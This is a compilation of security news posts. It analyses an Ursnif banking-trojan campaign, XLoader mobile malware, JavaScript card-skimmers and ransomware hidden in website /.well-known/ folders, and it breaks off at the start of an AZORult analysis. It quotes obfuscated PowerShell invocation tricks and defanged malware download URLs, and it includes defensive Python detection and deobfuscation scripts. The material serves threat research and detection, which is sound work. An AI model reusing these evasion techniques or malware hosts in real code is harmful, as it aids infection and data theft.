A few days ago, the researchers of ZLab Yoroi-Cybaze dissected another attack wave of the infamous Ursnif malware, also known as Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014. Ursnif/Gozi is active from over a decade and was one of the most active malware listed in 2017 and 2018. Today it constantly reaches several organization across Italy presenting itself in several ways, for instance as a malicious document delivered through email. 

The malware has evolved over time and has added functionality, in fact, apart from collecting banking credentials it is also able to collect keystrokes, cryptocurrencies, screenshots, webmail, integrating spyware features together with banking Trojans features.

During their investigations, researchers of ZLab Yoroi-Cybaze intercept a new variant of this malware delivered through malspam campaign towards Italian companies. This latest Ursnif variant shows the same modus operandi: a malicious document in which is embedded an highly obfuscated VBA macro that acts as a first stage dropper.

The Ursnif Threat Evolution

According to Microsoft since its appearance in 2009, Ursnif has shown incredible capabilities to steal users’ credentials, credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites while remaining more stealthiness as possible. It uses many advanced trick to evade several sandboxes environment and today is the most popular malware spreading in the wild. ZLab researchers have studied many samples in the past to profile the techniques used by the malware, to track its evolution and sophistication over time.

Table 1: Ursnif techniques evolution

First analyzed sample backs to January 2018. That Ursnif variant has delivered through a macro document and consist of a few obfuscated stage and a process hollowing injection technique to execute its payload. After a few months, in June 2018, we find evidence that  Ursnif was delivered through Necurs Botnet. The latter is one of the most famous botnets known nowadays and it has been used to deliver this Ursnif variant. The hidden link among Necurs and Ursnif has been discovered by ZLab researchers as explained in this link. In December 2018, a first shift is about the implementation of many dropper stages, in order to hide the final payload; moreover, in order to execute its payload, the malware does not perform a classical process injection as in the previous samples but an APC injection, not yet seen as payload injection trick used by Ursnif. 

The sample spread in February 2019 use two new features: the first one is a several obfuscated powershell stages in order to evade AVs and reduce its detection, the second one is the use of steganography technique. The latter permit to hide code into a legit image manipulating specific bits. Next, another code perform a decryption and execution of malicious code into the victim machine. 

In March 2019 another weaponized variant of Ursnif has been detected: in this case, to spread the malicious software, a google drive document combined with an obfuscated VBA Script is used over steganography. The last sample shown in previous table is similar to February’s sample but include another interesting feature: in this case a first VBS stage is encrypted using the Vigenere cipher; this allow to hide its malicious code and evade many sandboxes environment. We are observing a continuous evolution due to several features added in few months, this is an indicator that this malware is still in development and, observing also features fragmentation among variants lets us think, with high confidence, that there are various fork of the same codebase spreading in the wild.

Technical Analysis

Sha 25634669dde1e33ec96147540433f60e90056d38df1e3bb952fdc600e979d74f690
ThreatUrsnif dropper
Descrizione BreveExcel with macro
ssdeep1536:hn1DN3aMePUKccCEW8yjJTdrBX/3t4k3hOdsylKlgryzc4bNhZFGzE+cL4LgldAK:hn1DN3aM+UKc

Table 2: information about Ursnif dropper

The most widespread infection vector observed were the macro enabled office documents, and this variant uses the same technique too. The malicious document looks like an invoice that requires enabling macros in order to proper view its contents. 

Figure 1: excel document requiring macro enabling

The whole infection chain begins when the macro is enabled. This Ursnif variant presents a  macro protection technique technique that it’s not present in previous variants, in order to make the analysis hard avoiding manipulation and extraction. After extraction of OLE object inside the document we are able to see the content of macros and their associated name, as shown in the following figure:

Figure 2: macros isolation

Now it is possible to isolate an interesting macro in order to further analyze it in detail. It contains a piece of VBA that was extracted.

Figure 3: VB macro source code

Unlike past waves, the malware author added a “VigenereDo” function to decrypt and reconstruct the initial infection step, using an algorithm based on the Vigenère cipher, a classical polyalphabetic substitution cipher.

The resulting command text is obtained by combining the obfuscated strings defined in the “jeneric” function with other strings (not visible in the figure); after some further manipulation it is possible to spot the whole script that will be executed. When the user enables macros, the “wmic.exe” process runs the following code through the “wmic ‘PRocesS’ “Call” ‘CREATe’” command.

Figure 4: the PowerShell script (encrypted)

At this point, several PowerShell deobfuscation steps occur. First, every occurrence of “${1F}” in the PowerShell string is replaced with the content of the “$1F” variable, which is the “,” (comma) character. After these replacements, the script is run through the “iex” primitive, invoked first as “.($psHomE[4]+$pshOMe[34]+’X’)” and then as “( “. ( `$ShELLid[1]+`$shelLID[13]+’X’)”; both expressions index single characters out of the $PSHOME and $ShellId automatic variables to spell “ieX” without writing the alias in clear. The complete deobfuscated script is the following.
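As an added example (not code from the Yoroi or Security Affairs analysis), the following Python script performs the deobfuscation steps just described statically, on a constructed sample: it strips a letter-only Vigenère layer (the sample’s exact alphabet is not shown, so the classical variant is assumed), splices the literal value of “${1F}” back in, and resolves the “$psHome[...]”/“$ShellId[...]” character-indexing tricks, which spell “ieX” on a default Windows PowerShell 5.1 install (the $PSHOME and $ShellId values used are assumptions).

```python
import re

# Values of the two PowerShell automatic variables on a default Windows
# PowerShell 5.1 install (an assumption for this example).
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"
SHELLID = "Microsoft.PowerShell"
_VARS = {"pshome": PSHOME, "shellid": SHELLID}

# One concatenation term: an indexed character such as $psHomE[4] (a backtick
# before the $ is PowerShell's escape and changes nothing) or a quoted literal.
_TERM = r"(?:`?\$(?:pshome|shellid)\[\d+\]|'[^']*'|\"[^\"]*\")"
_INDEX = re.compile(r"`?\$(pshome|shellid)\[(\d+)\]", re.IGNORECASE)
_CONCAT = re.compile(r"\(\s*(" + _TERM + r"(?:\s*\+\s*" + _TERM + r")*)\s*\)",
                     re.IGNORECASE)
# .('ieX') or &('ieX'): the call operator applied to a command name string.
_INVOKE = re.compile(r"[.&]\s*\(\s*'([^']*)'\s*\)")


def vigenere(text, key, decrypt=False):
    """Stage 0, the macro's cipher layer. Letters are shifted by the matching
    key letter; other characters pass through and do not advance the key.
    The classical letter-only variant is assumed (the sample's alphabet is
    not shown in the analysis)."""
    shifts = [ord(k.lower()) - 97 for k in key if k.isalpha()]
    if not shifts:
        raise ValueError("key needs at least one letter")
    out, ki = [], 0
    for ch in text:
        if ch.isalpha():
            base = 65 if ch.isupper() else 97
            s = shifts[ki % len(shifts)]
            out.append(chr((ord(ch) - base + (-s if decrypt else s)) % 26 + base))
            ki += 1
        else:
            out.append(ch)
    return "".join(out)


def substitute_placeholder(script, name, value):
    """Stage 1: splice the literal value of a helper variable into every
    "${name}" occurrence (the sample used ${1F} for a comma)."""
    return script.replace("${" + name + "}", value)


def _resolve_term(term):
    m = _INDEX.fullmatch(term)
    if m:
        return _VARS[m.group(1).lower()][int(m.group(2))]
    return term[1:-1]  # quoted literal: drop the quotes


def resolve_concats(script):
    """Stage 2: fold ($psHomE[4]+$pshOMe[34]+'X') into ('ieX')."""
    def fold(m):
        parts = re.findall(_TERM, m.group(1), re.IGNORECASE)
        return "('" + "".join(_resolve_term(p) for p in parts) + "')"
    return _CONCAT.sub(fold, script)


def resolve_invocations(script):
    """Stage 3: turn .('ieX') / &('ieX') into the bare command, normalising
    the Invoke-Expression alias to lowercase so detections can match it."""
    def unwrap(m):
        name = m.group(1)
        return "iex" if name.lower() == "iex" else name
    return _INVOKE.sub(unwrap, script)


def deobfuscate(script, placeholders=None, key=None):
    if key is not None:
        script = vigenere(script, key, decrypt=True)
    for name, value in (placeholders or {}).items():
        script = substitute_placeholder(script, name, value)
    return resolve_invocations(resolve_concats(script))


# Constructed sample imitating the shapes quoted in the analysis; it is not
# the real Ursnif stage and the key is invented.
KEY = "Ursnif"
SAMPLE = (
    "$1F=','\n"
    ".($psHomE[4]+$pshOMe[34]+'X') \"Write-Output ('a'${1F}'b')\"\n"
    "&( `$ShELLid[1]+`$shelLID[13]+'X') 'Get-Date'\n"
)
ENCRYPTED_SAMPLE = vigenere(SAMPLE, KEY)

if __name__ == "__main__":
    print(deobfuscate(ENCRYPTED_SAMPLE, {"1F": ","}, key=KEY))
```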

Figure 5: the first PowerShell script (decrypted)
Figure 6: image with malicious embedded powershell script

First of all the malware checks the current time zone to verify whether it is set to +01:00. If so, it downloads the next stage from “hxxps://i[.]imgur[.]com/TVkWKQa[.]png”. As in other recent attacks, the downloaded image hides another PowerShell stage using steganography.

The malware code iterates over each pixel of the image and, through several binary operations, grabs the two least significant bits (LSBs) of every byte of the picture, concatenating them with the LSBs of the following bytes to rebuild a complete PowerShell script.
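An added Python example (neither the malware’s code nor part of the original analysis) of the analyst-side recovery of such a 2-LSB payload: the “image” is a constructed buffer of raw pixel bytes, so decoding a real PNG to raw bytes first (for instance with Pillow) is assumed, and the embedding helper exists only to build that test buffer. The scanner shows how to recover the stage when its length is unknown, using the fact that extracted script text is printable while a clean image’s LSB plane decodes to noise.

```python
import random


def embed_2lsb(cover, payload):
    """Only used to build the constructed test image: each payload byte is
    written MSB-first, two bits at a time, into the low two bits of four
    consecutive cover bytes (the embedding the analysis describes)."""
    if len(payload) * 4 > len(cover):
        raise ValueError("cover too small for payload")
    out = bytearray(cover)
    i = 0
    for byte in payload:
        for shift in (6, 4, 2, 0):
            out[i] = (out[i] & 0xFC) | ((byte >> shift) & 0x03)
            i += 1
    return bytes(out)


def extract_2lsb(pixels, n_bytes):
    """Analyst-side recovery: walk the pixel bytes, keep the two LSBs of each
    and concatenate them until n_bytes have been rebuilt."""
    if n_bytes * 4 > len(pixels):
        raise ValueError("not enough pixel bytes")
    out = bytearray()
    for k in range(n_bytes):
        value = 0
        for b in pixels[4 * k:4 * k + 4]:
            value = (value << 2) | (b & 0x03)
        out.append(value)
    return bytes(out)


def looks_like_script(data, threshold=0.95):
    """A correctly extracted PowerShell stage is almost entirely printable
    ASCII; the LSB plane of a clean image decodes to roughly 38% printable."""
    if not data:
        return False
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) >= threshold


def scan_for_script(pixels, max_bytes=256, window=32):
    """Grow the extracted prefix window by window and return the longest one
    that still reads as text, or None if the LSB plane carries no text."""
    best = None
    for n in range(window, min(max_bytes, len(pixels) // 4) + 1, window):
        chunk = extract_2lsb(pixels, n)
        if looks_like_script(chunk):
            best = chunk
        else:
            break
    return best


# Constructed test data: deterministic pseudo-random "pixels" and a harmless
# 64-byte stand-in for the hidden stage (space-padded to a window multiple).
_rng = random.Random(7)
COVER = bytes(_rng.randrange(256) for _ in range(1024))
PAYLOAD = b"Write-Output 'constructed second stage'".ljust(64)
STEGO = embed_2lsb(COVER, PAYLOAD)

if __name__ == "__main__":
    print(scan_for_script(STEGO))
```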

Figure 7: second powershell script extracted from the steganographic image

Et voilà, another URL is found but, before downloading the next stage from it, the malware performs a further check on the value returned by “CurrentCulture”.

Figure 8: CurrentCulture verification in PowerShell

If the check passes, once again through the “IEX” primitive it tries to download another component, named “ose000000.exe”, from “hxxps://nuovalo[.]site/RGI82B3.-tmp-tmp”, saving it into the “%TEMP%” folder. The following table shows information about the sample.

SHA 256: 0f2245eec921949d9a1d8e13cab747a7fbb137aaee3b9ddacee0681c8b2e4fa8
Threat: Ursnif
Short description: Final payload of Ursnif banking malware
ssdeep: 6144:LCLAh6EzJYJtmavTXyulcNcyuo8PGJMewXo79y:L54EzetmCb3cNc3o0PR4

Table 3: information about Ursnif final payload

Conclusion

This latest Ursnif wave keeps showing a complex infection process. The starting point of the entire chain was the usual Visual Basic macro, this time protecting its code with a Vigenère cipher and responsible for decrypting the additional PowerShell stage, which is launched by abusing Windows Management Instrumentation (WMI) functionality so as to decouple it from the original infection tree. The chain is then completed by exploiting steganography to bypass network detection, and by several environmental checks that ensure the malware is running on the expected machines, confirming the highly evasive trend of this aggressive threat.

Further technical details, including Indicators of Compromise, are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Ursnif Trojan, cybercrime)

The post Ursnif: The Latest Evolution of the Most Popular Banking Malware appeared first on Security Affairs.



Security Affairs

Security Affairs: New XLoader variant leverages Twitter to hide C2 addresses

Security experts at Trend Micro spotted a new variant of the XLoader Trojan that is targeting Android devices by posing as a security application.

Trend Micro discovered a new variant of the XLoader Trojan that is targeting Android devices by posing as a security application; the malware also attempts to infect Apple devices (iPhones and iPads) through a malicious iOS profile. XLoader has been observed since 2018, but experts traced it back to January 2015; Trend Micro linked the threat to the FakeSpy malware.

The new XLoader Trojan variant features an updated deployment technique and includes code changes that make it different from previous variants.

The malicious code was observed in previous attacks posing as Facebook, Chrome, and other legitimate applications.

“Trend Micro researchers found a new variant that uses a different way to lure users. This new XLoader variant poses as a security app for Android devices, and uses a malicious iOS profile to affect iPhone and iPad devices.” reads the analysis published by Trend Micro. “Aside from a change in its deployment techniques, a few changes in its code set it apart from its previous versions.”

Attackers hosted the malicious code on fake websites mimicking legitimate ones, such as the website of a Japanese mobile phone operator. To trick users into downloading the fake security Android application package (APK), they sent victims SMS messages containing links to the bogus websites.

When Android users access these websites or press any of the buttons, they are prompted to download the malicious APK.

“However, successfully installing this malicious APK requires that the user has allowed the installation of such apps as controlled in the Unknown Sources settings. If users allow such apps to be installed, then it can be actively installed on the victim’s device.” continues the analysis.

The attack chain on iOS devices is more complex: users are served a phishing page that asks them to install a malicious configuration profile, presented as the solution to an issue preventing the site from loading.

“Accessing the same malicious site would redirect its user to another malicious website (hxxp://apple-icloud[.]qwq–japan[.]com or hxxp://apple-icloud[.]zqo–japan[.]com) that prompts the user to install a malicious iOS configuration profile to solve a network issue preventing the site to load.” continues the analysis. “If the user installs the profile, the malicious website will open, revealing it to be an Apple phishing site,”

XLoader

Like previous versions, XLoader 6.0 abuses social media user profiles to hide its C&C addresses: this variant encodes the real command and control (C&C) address in the names of Twitter profiles.

It implements a command called “getPhoneState”, which collects unique identifiers of the mobile device such as IMSI, ICCID, Android ID, and device serial number.

On Apple devices, the malicious iOS profile gathers the unique device identifier (UDID), International Mobile Equipment Identity (IMEI), Integrated Circuit Card ID (ICCID), mobile equipment identifier (MEID), version number, and product number. 

“After the profile is installed, the user will then be redirected to another Apple phishing site.” reads the analysis. “The phishing site uses the gathered information as its GET parameter, allowing the attacker to access the stolen information,” the security researchers say.

While analyzing this attack, experts spotted another variant of XLoader that poses as a pornography app developed to target South Korean Android users. The malicious APK connects to a fake website that runs XLoader in the background and uses a different fixed Twitter account.

Experts also found a variant that leverages Instagram and Tumblr to hide its C&C infrastructure.

Further technical details, including Indicators of Compromise, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – XLoader, malware)

The post New XLoader variant leverage Twitter to hide C2 addresses appeared first on Security Affairs.




Security Affairs: Group-IB report: JS-sniffers infected 2440 websites around the world

Crime without punishment: Group-IB issues a new report on JS-sniffers that infected 2440 websites around the world

Group-IB, an international company that specializes in preventing cyberattacks, has issued a new comprehensive report on JavaScript-sniffers, a type of malware designed to steal customer payment data from online stores. Group-IB researchers analyzed 2,440 infected e-commerce websites with a total of around 1.5 million unique daily visitors whose data could have been compromised. Group-IB’s report features an in-depth analysis of the JS-sniffer darknet market, its entire infrastructure and the monetization methods, which bring the developers millions of dollars.

New threats for E-commerce market

The e-commerce market is booming, and few people do not buy online now. According to a Pew Research Center survey of U.S. adults, eight in ten Americans are online shoppers. However, the convenience of online shopping has its downsides: users who pay by card online face countless cyber threats, including JavaScript-sniffers.

Prior to the publication of Group-IB’s report “Crime without punishment: In-depth analysis of JS-sniffers”, researchers at RiskIQ and Flashpoint were the first to publish a joint report on the activities of cybercriminals using JS-sniffers; they gave the umbrella term MageCart to 12 cybercriminal groups. Group-IB experts studied the discovered JS-sniffers and, using their own analytical systems, were able to map their entire infrastructure and gain access to their source code, administrative panels, and the cybercriminals’ tools. This approach helped identify 38 unique JS-sniffer families, 15 of which are presented in detail in the report, available to Group-IB Threat Intelligence customers. At least 8 of them were discovered and described for the very first time.

The threat posed by JS-sniffers was long under the radar of malware analysts, who deemed it insignificant and unworthy of in-depth research. However, several incidents have shown the opposite to be true, including: 380,000 victims of a JS-sniffer that infected the British Airways website and mobile app, the compromise of Ticketmaster users’ payment data, and the recent incident involving the UK website of the international sporting goods giant Fila, which could have led to the theft of payment details of at least 5,600 customers. “When a website is infected, everyone is a victim – end users, payment systems, banks, and companies that sell their goods and services online,” says Dmitry Volkov, CTO and Head of Threat Intelligence at Group-IB. “The fact that there is still little known about incidents involving JS-sniffers and the damages they cause indicates that this problem is understudied, which allows groups developing sniffers to steal money from online shoppers to act with impunity and get away with it.”

JavaScript-sniffers: a “hidden threat” you don’t want to know about

A JS-sniffer is the online equivalent of a credit card skimmer. However, while a skimmer is a small device installed on ATMs that intercepts bank card details, a JS-sniffer is a few lines of code that cybercriminals inject into websites to capture data entered by users, such as payment card numbers, names, addresses, passwords, etc. In general, hackers sell the obtained payment data to carders on darknet forums. The price for a stolen card ranges from around $1 to $5, occasionally from $10 to $15. A significant number of underground forums where JS-sniffers are put up for sale or rent are Russian-speaking.

Approximate estimates suggest that the profits made by JS-sniffer developers may amount to hundreds of thousands of dollars per month. For instance, websites infected by the WebRank family of JS-sniffers attract around 250,000 visitors every day. If the conversion on these websites was only 1%, this would mean that 2,500 shoppers carry out transactions every single day. This in turn means that, at the minimum price range charged for stolen cards, WebRank developers can make between $2,500 and $12,500 for a JS-sniffer’s one day of “work”, which amounts to $75,000 to $375,000 per month. Not to mention that WebRank is only third in the “ranking” of mass infections. Websites infected by MagentoName and CoffeMokko JS-sniffers attract more than 440,000 visitors per day.

How JS-sniffers attack

Group-IB’s analysis of 2,440 infected websites revealed that more than half of the resources were attacked by the MagentoName JS-sniffer family, whose operators exploit vulnerabilities in older versions of the Magento CMS (Content Management System) to inject malicious code into websites powered by this CMS. More than 13% of infections are carried out by the WebRank JS-sniffer family, which attacks third-party sites to inject its malicious code into the targeted websites. More than 11% of infections are carried out by JS-sniffers from the CoffeMokko family, whose operators use obfuscated scripts designed to steal information from the payment forms of payment systems whose field names are hardcoded into the JS-sniffer’s code. Such payment systems include PayPal, Verisign, Authorize.net, eWAY, Sage Pay, WorldPay, Stripe, USAePay, and others. Many JS-sniffer families use unique options for each payment system, which requires modifying and testing the script before each infection.

Most identified JS-sniffers are set up to steal information from the different payment forms of website management systems such as Magento, OpenCart, Shopify, WooCommerce and WordPress. Such JS-sniffer families include PreMage, MagentoName, FakeCDN, Qoogle, GetBilling, and PostEval. Other JS-sniffers are universal and can be integrated into the code of any website, regardless of the systems used (G-Analytics, WebRank).

During its research, Group-IB discovered signs of “competition”: some JS-sniffer families could detect and eliminate JS-sniffers belonging to competitors that injected the victim’s website first (for example, MagentoName). Others use the “body” of the competitor’s JS-sniffer, “taking over” the data it intercepts and transferring it to its own gate (for example, WebRank). JS-sniffers can be modified to make it more difficult to detect them. For example, ImageID and ReactGet are able to bypass most detection systems because they are activated only when the buyer is completing their transaction on the website; the rest of the time, the JS-sniffer is “inactive” and doesn’t give itself away. Some families have a number of unique JS-sniffers for each infection, such as CoffeMokko. Each JS-sniffer in this family is used only once to infect a single website.

The G-Analytics JS-sniffers family is distinctive in that it not only injects malicious code into website’s HTML code but also the server-side PHP scripts that handle payments on e-commerce websites. This technique makes it significantly more difficult for analysts to detect the malicious code. JS-sniffers such as ImageID and G-Analytics are able to imitate legitimate services such as Google Analytics and jQuery and disguise their malicious activity with legitimate scripts and domain names that are similar to legitimate ones.
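An added example, not from the Group-IB report: a Python audit of the third-party scripts a checkout page loads, flagging hosts that are within two edits of an allow-listed origin or that carry an imitated brand name under an unknown domain, which is the disguise the paragraph above describes. The allowlist, the brand list and the sample HTML are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script origins this (constructed) shop legitimately loads; in practice the
# site owner maintains this list and reviews any change to it.
ALLOWED_HOSTS = {"www.google-analytics.com", "code.jquery.com", "shop.example"}
# Brands the report says sniffer domains imitate.
IMITATED_BRANDS = ("google-analytics", "jquery")


class _ScriptSrcParser(HTMLParser):
    """Collect the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def script_sources(html):
    parser = _ScriptSrcParser()
    parser.feed(html)
    return parser.sources


def levenshtein(a, b):
    """Edit distance, used to catch one- or two-character typo-squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _strip_www(host):
    return host[4:] if host.startswith("www.") else host


def classify_host(host):
    if host in ALLOWED_HOSTS:
        return "allowed"
    for allowed in ALLOWED_HOSTS:
        if 0 < levenshtein(_strip_www(host), _strip_www(allowed)) <= 2:
            return "lookalike of " + allowed
    for brand in IMITATED_BRANDS:
        if brand in host:
            return "unknown host using brand " + brand
    return "unknown host"


def audit_scripts(html, page_url):
    """Return (src, verdict) for every script that is not on the allowlist."""
    page_host = urlparse(page_url).hostname
    findings = []
    for src in script_sources(html):
        host = urlparse(src).hostname
        if host is None:            # relative src: same origin as the page
            host = page_host
        verdict = classify_host(host)
        if verdict != "allowed":
            findings.append((src, verdict))
    return findings


# Constructed checkout page: one first-party script, one genuine analytics
# script, one typo-squatted analytics host and one unknown "jquery" CDN.
SAMPLE_HTML = """
<html><head>
<script src="/js/checkout.js"></script>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script src="https://google-analytlcs.com/ga.js"></script>
<script src="https://static.jquery-cdn-files.net/jquery.min.js"></script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for src, verdict in audit_scripts(SAMPLE_HTML, "https://shop.example/checkout"):
        print(verdict, "->", src)
```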

Attacks involving JS-sniffers can have several stages. When analysing the code of one of the infected online stores, Group-IB’s specialists discovered that the cybercriminals had not limited themselves to simply injecting the JS-sniffer, but created a fake payment form that was loaded from a different compromised website. The form gave users two payment options: by credit card or PayPal. If the user chose to pay via PayPal, the fake form would show an error message saying that this payment method was currently unavailable, and the only way to pay was using a credit card.

Customers and buyers: how the JS-sniffer market works

The development of the JS-sniffer market has made the relationships between its players increasingly complicated. A JS-sniffer can be used not only by the cybercriminal group that developed it, but also by other groups that have bought or rented it as a service. In some cases, it is difficult to determine just how many cybercriminal groups are using a given JS-sniffer, which is why Group-IB experts call them families, not groups.

JS-sniffers’ cost ranges from $250 to $5,000 on underground forums. Some services offer partnerships: the customer provides access to the compromised online store and receives a share of the profits, while the JS-sniffer developer is responsible for providing hosting servers, tech support, and an administrative panel for the customer. Such “market relationships” between developers, sellers, intermediaries and buyers on the underground market make it difficult to attribute the crime committed to a particular group. Nevertheless, the indicators collected by Group-IB linked to the activities of each of the 38 JS-sniffer families help solve this problem. Moreover, Group-IB’s report contains detailed recommendations for all parties that may fall victim to JS-sniffers: shoppers, banks, online stores, and payment systems. The research continues. Descriptions of analysed JS-sniffers and new information about them are regularly uploaded to Group-IB’s Threat Intelligence system.

About the author: Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

The report published by Group-IB is available here:

https://www.group-ib.com/resources/threat-research/js-sniffers.html

Pierluigi Paganini

(SecurityAffairs – JS-sniffers, cybercrime)

The post Group-IB report: JS-sniffers infected 2440 websites around the world appeared first on Security Affairs.




35+ Powerful Cybersecurity Statistics to Know in 2019

Cyberattacks are nothing new, but they’re a growing problem for all types of businesses across all industries. Depending on the severity of the attack, there are a variety of defense

The post 35+ Powerful Cybersecurity Statistics to Know in 2019 appeared first on The Cyber Security Place.

Crooks use hidden directories of compromised HTTPS sites to deliver malware

Attackers Store Malware in Hidden Directories of Compromised HTTPS Sites

Security experts at Zscaler discovered that threat actors are using hidden “well-known” directories of HTTPS sites to store and deliver malicious payloads.

Crooks are utilizing hidden “well-known” directories of HTTPS sites running WordPress and Joomla websites to store and serve malicious payloads.

Hacked websites were used for several malicious purposes: experts observed compromised WordPress and Joomla websites serving Shade/Troldesh ransomware, coin miners and backdoors, and sometimes hosting phishing campaigns.

The compromised WordPress sites were running versions 4.8.9 to 5.1.1 of the popular CMS, which are affected by a cross-site request forgery (CSRF) flaw in the WordPress comment section, a feature that is enabled by default.

An attacker can hack a website running a vulnerable version of WordPress that has comments enabled by tricking an administrator of a target site into visiting a website set up by the attacker. 

According to the experts, the cybercriminals targeted websites running outdated CMS plugins and themes or server-side software. Compromised websites were using SSL certificates issued by Automatic Certificate Management Environment (ACME)-driven certificate authorities, such as Let’s Encrypt, GlobalSign, cPanel, and DigiCert.

“We have been monitoring the compromised HTTPS sites for a few weeks and have noticed that attackers are favoring a well-known hidden directory present on the HTTPS website for storing and distributing Shade ransomware and phishing pages.” reads the analysis from Zscaler.

“The hidden /.well-known/ directory in a website is a URI prefix for well-known locations defined by IETF and commonly used to demonstrate ownership of a domain. The administrators of HTTPS websites that use ACME to manage SSL certificates place a unique token inside the /.well-known/acme-challenge/ or /.well-known/pki-validation/ directories to show the certificate authority (CA) that they control the domain.”

Threat actors abused a well-known hidden directory in the HTTPS sites for storing the malware. The directory is a URI prefix for well-known locations defined by IETF and used to demonstrate the ownership of a domain.

Administrators of HTTPS websites using ACME to manage SSL certificates place a unique token inside the folder, to show the CA that the domain is under their control. The CA scans this folder for a code that was previously sent to the administrator.

“The attackers use these locations to hide malware and phishing pages from the administrators. The tactic is effective because this directory is already present on most HTTPS sites and is hidden, which increases the life of the malicious/phishing content on the compromised site,” continues Zscaler.

The following graph shows the different types of threats distributed with this approach; Shade ransomware was the most common one:

[Graph: threat types served from hidden “well-known” directories of compromised HTTPS sites]

Compromised websites delivering the Shade/Troldesh ransomware hosted three types of files: HTML pages, ZIP archives, and EXE files masquerading as .jpg images.

The HTML files redirect victims to download ZIP files (reso.zip, rolf.zip, and stroi-invest.zip) that contain the JavaScript file; msg.jpg and msges.jpg are EXE files that are the Shade ransomware itself.
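A defender-side check for the abuse described above, added here as an example and not taken from Zscaler’s analysis: it walks a site’s /.well-known/ tree and flags files whose content is a PE executable, a ZIP archive or an HTML page rather than an ACME challenge response, including EXE files carrying a .jpg name like the msg.jpg sample named in the article. The webroot, the file names and the file contents are constructed for the demo, and the challenge-file format check follows the HTTP-01 layout from RFC 8555 (token, dot, account thumbprint).

```python
import os
import re
import tempfile

# Leading bytes the write-up associates with the abuse: EXE files renamed to
# .jpg, ZIP archives and HTML redirectors.  JPEG is listed so that a genuine
# image can be told apart from an executable wearing a .jpg name.
MAGIC = {
    b"MZ": "pe-executable",
    b"PK\x03\x04": "zip-archive",
    b"\xff\xd8\xff": "jpeg-image",
}
HTML_RE = re.compile(rb"^\s*<(!doctype|html|script|meta)", re.IGNORECASE)
# An ACME HTTP-01 challenge file is named after a base64url token and contains
# only "<token>.<account thumbprint>" (RFC 8555); anything else does not belong.
ACME_BODY_RE = re.compile(rb"^[A-Za-z0-9_-]{20,}\.[A-Za-z0-9_-]{20,}\s*$")


def classify(head: bytes) -> str:
    """Content-based type of a file, ignoring its extension."""
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    if HTML_RE.match(head[:256]):
        return "html"
    if ACME_BODY_RE.match(head):
        return "acme-challenge"
    return "unknown"


def scan_well_known(webroot: str) -> list:
    """Walk <webroot>/.well-known and report files that should not be there."""
    findings = []
    base = os.path.join(webroot, ".well-known")
    for dirpath, _dirs, files in os.walk(base):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                head = fh.read(4096)
            kind = classify(head)
            ext = os.path.splitext(name)[1].lower()
            reason = None
            if kind in ("pe-executable", "zip-archive", "html"):
                reason = f"{kind} stored under .well-known"
            elif ext == ".jpg" and kind != "jpeg-image":
                reason = f".jpg extension but content is {kind}"
            if reason:
                rel = os.path.relpath(path, webroot).replace(os.sep, "/")
                findings.append({"path": rel, "kind": kind, "reason": reason})
    return sorted(findings, key=lambda f: f["path"])


def build_demo_webroot() -> str:
    """Constructed sample site for a stand-alone run; nothing here is real malware."""
    root = tempfile.mkdtemp(prefix="wellknown-demo-")
    chal = os.path.join(root, ".well-known", "acme-challenge")
    os.makedirs(chal)
    token = "A" * 43  # placeholder ACME token, not a real one
    samples = {
        token: (token + "." + "B" * 43).encode(),           # legitimate challenge response
        "msg.jpg": b"MZ\x90\x00" + b"\x00" * 60,             # PE header behind a .jpg name
        "reso.zip": b"PK\x03\x04" + b"\x00" * 26,            # ZIP local-file header
        "index.html": b"<html><head><title>redirect</title></head></html>",
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,     # genuine JPEG header
    }
    for name, data in samples.items():
        with open(os.path.join(chal, name), "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for finding in scan_well_known(build_demo_webroot()):
        print(f"{finding['path']}: {finding['reason']}")
```

Run against a real webroot, the only expected contents of /.well-known/acme-challenge/ are short-lived token files; anything with a PE, ZIP or HTML signature is worth an alert, and comparing file modification times against the last certificate renewal narrows the list further.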

The variant of Shade/Troldesh ransomware involved in the attack uses a TOR client to connect to the C2 and encrypts both the content and name of targeted files.

Attackers used phishing pages related to several popular services and brands, such as Office 365, Microsoft, DHL, Dropbox, Bank of America, Yahoo, Gmail, and other brands, the security researchers say.

Further technical details, including Indicators of Compromise, are reported in the analysis.

Pierluigi Paganini

(SecurityAffairs – HTTPs, Hacking)

The post Crooks use hidden directories of compromised HTTPS sites to deliver malware appeared first on Security Affairs.


Analyzing AZORult malware using NSA Ghidra suite

Cybaze-Yoroi ZLAB malware researchers decided to use the NSA Ghidra suite in a real case study, the analysis of the AZORult malware.

Introduction

One of the most anticipated moments in the infosec community during the last few months was, without doubt, the public release of Ghidra. On the 5th of March, at the RSA Conference, Ghidra was presented to the public, revealing the inner details of the Software Reverse Engineering (SRE) framework that the National Security Agency had used for more than a decade.

Its release was a sort of “main event” for security researchers all around the globe, who immediately started exploring its functionality to find its place in the reversing tool landscape. The Cybaze-Yoroi ZLAB team also decided to try it out, but using a real case study: AZORult, one of the most active threats spreading today, which constantly adopts new methods to avoid detection. For this reason, a recent AZORult sample was chosen to field-test the NSA reverse engineering tool.

Technical Analysis

Hash: 12a7b79430bf3b788396009eadb6cbc4da97cba55c6653048d2dd294fa90dc3a
Threat: Azorult
Size: 809 KB
